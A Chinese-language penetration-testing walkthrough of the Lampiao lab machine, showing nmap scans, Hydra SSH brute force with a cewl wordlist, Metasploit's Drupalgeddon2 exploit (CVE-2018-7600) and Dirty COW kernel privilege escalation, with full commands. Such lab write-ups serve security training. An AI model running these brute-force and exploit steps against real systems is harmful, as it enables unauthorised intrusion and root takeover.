Lampiao靶机渗透测试教学文档<\/h1>

环境配置<\/h2>
攻击机：Kali Linux (IP: 192.168.21.129)<\/li>
靶机：Lampiao (IP: 192.168.21.145)<\/li> <\/ul>
信息收集阶段<\/h2>

1. 确定靶机IP<\/h3>
使用以下命令扫描网段确定靶机IP：<\/p>
nmap 192.168.21.129\/24
<\/span><\/span># 或<\/span>
<\/span><\/span>arp-scan -l
<\/span><\/span><\/code><\/pre>2. 端口扫描与服务识别<\/h3>
nmap 192.168.21.145 -p- -sV
<\/span><\/span><\/code><\/pre>参数说明：<\/p>

-p-<\/code>：扫描全端口(1-65535)<\/li>
-sV<\/code>：探测服务版本<\/li>
<\/ul>
扫描结果：<\/p>

开放端口：80、1898、22<\/li>
<\/ul>
攻击方法一：利用字典爆破SSH获取shell<\/h2>
1. Web信息收集<\/h3>
访问1898端口的Web服务，发现：<\/p>

登录框尝试SQL注入无果<\/li>
发现两个可点击链接(80端口无内容)<\/li>
第二个链接URL类似...\/1<\/code>和...\/3<\/code>，尝试修改为...\/2<\/code>发现m4a音频文件和照片<\/li>
访问音频文件http:\/\/192.168.21.145:1898\/audio.m4a<\/code>，听到用户名"tiago"<\/li>
<\/ul>
2. 使用cewl生成字典<\/h3>
cewl http:\/\/192.168.21.145 -w 1.txt
<\/span><\/span><\/code><\/pre>参数说明：<\/p>

-w<\/code>：将结果保存到指定文件<\/li>
<\/ul>
3. 使用Hydra爆破SSH<\/h3>
hydra -l tiago -P 1.txt 192.168.21.145 ssh
<\/span><\/span><\/code><\/pre>参数说明：<\/p>

-l<\/code>：指定用户名<\/li>
-P<\/code>：指定密码字典文件<\/li>
<\/ul>
4. SSH登录验证<\/h3>
ssh tiago@192.168.21.145
<\/span><\/span><\/code><\/pre>攻击方法二：使用Metasploit获取shell<\/h2>
1. 目录扫描<\/h3>
dirsearch -u http:\/\/192.168.21.145:1898
<\/span><\/span><\/code><\/pre>发现\/CHANGELOG.txt<\/code>文件，显示CMS为Drupal 7.54<\/p>
2. 搜索相关漏洞<\/h3>
Drupal 7.54存在远程代码执行漏洞(CVE-2018-7600)<\/p>
3. 使用Metasploit攻击<\/h3>
msfconsole
<\/span><\/span>search drupal
<\/span><\/span>use exploit\/unix\/webapp\/drupal_drupalgeddon2
<\/span><\/span>show options
<\/span><\/span>set rhost 192.168.21.145
<\/span><\/span>set rport 1898<\/span>
<\/span><\/span>run
<\/span><\/span><\/code><\/pre>提权阶段<\/h2>
1. 检测提权可能性<\/h3>
上传Linux内核漏洞检测脚本：<\/p>
upload \/path\/to\/linux-exploit-suggester \/tmp
<\/span><\/span><\/code><\/pre>在靶机上：<\/p>
cd \/tmp
<\/span><\/span>chmod +x linux-exploit-suggester
<\/span><\/span>.\/linux-exploit-suggester
<\/span><\/span><\/code><\/pre>检测结果：存在脏牛(Dirty COW)提权漏洞(CVE-2016-5195)<\/p>
2. 利用脏牛漏洞提权<\/h3>
下载exp脚本：

https:\/\/github.com\/gbonacini\/CVE-2016-5195<\/p>
上传并编译：<\/p>
upload \/root\/dcow.cpp \/tmp\/dcow.cpp
<\/span><\/span>cd \/tmp
<\/span><\/span>g++ -Wall -pedantic -O2 -std=<\/span>c++11 -pthread -o dcow dcow.cpp -lutil
<\/span><\/span><\/code><\/pre>执行提权：<\/p>
python -c 'import pty; pty.spawn("\/bin\/bash")'<\/span>
<\/span><\/span>.\/dcow
<\/span><\/span>su root
<\/span><\/span><\/code><\/pre>工具总结<\/h2>

cewl<\/strong>：网站字典生成工具<\/li>
nmap<\/strong>：主机发现、端口扫描、服务识别<\/li>
Hydra<\/strong>：账号密码爆破工具<\/li>
Metasploit Framework<\/strong>：漏洞利用框架<\/li>
dirsearch<\/strong>：Web目录扫描工具<\/li>
linux-exploit-suggester<\/strong>：Linux内核漏洞检测脚本(需自行下载)<\/li>
Dirty COW exploit<\/strong>：脏牛漏洞利用工具(需自行下载)<\/li>
<\/ol>
攻击思路总结<\/h2>

扫描端口服务，识别开放的服务和版本<\/li>
访问Web服务，寻找功能点和信息泄露<\/li>
方法一：

通过音频文件获取用户名<\/li>
使用cewl生成字典<\/li>
爆破SSH获取shell<\/li>
<\/ul>
<\/li>
方法二：

目录扫描发现CMS版本信息<\/li>
搜索已知漏洞<\/li>
使用Metasploit利用漏洞获取shell<\/li>
<\/ul>
<\/li>
提权：

检查简单提权方式(sudo、suid等)<\/li>
使用漏洞检测工具识别内核漏洞<\/li>
下载并编译exp脚本进行提权<\/li>
<\/ul>
<\/li>
<\/ol>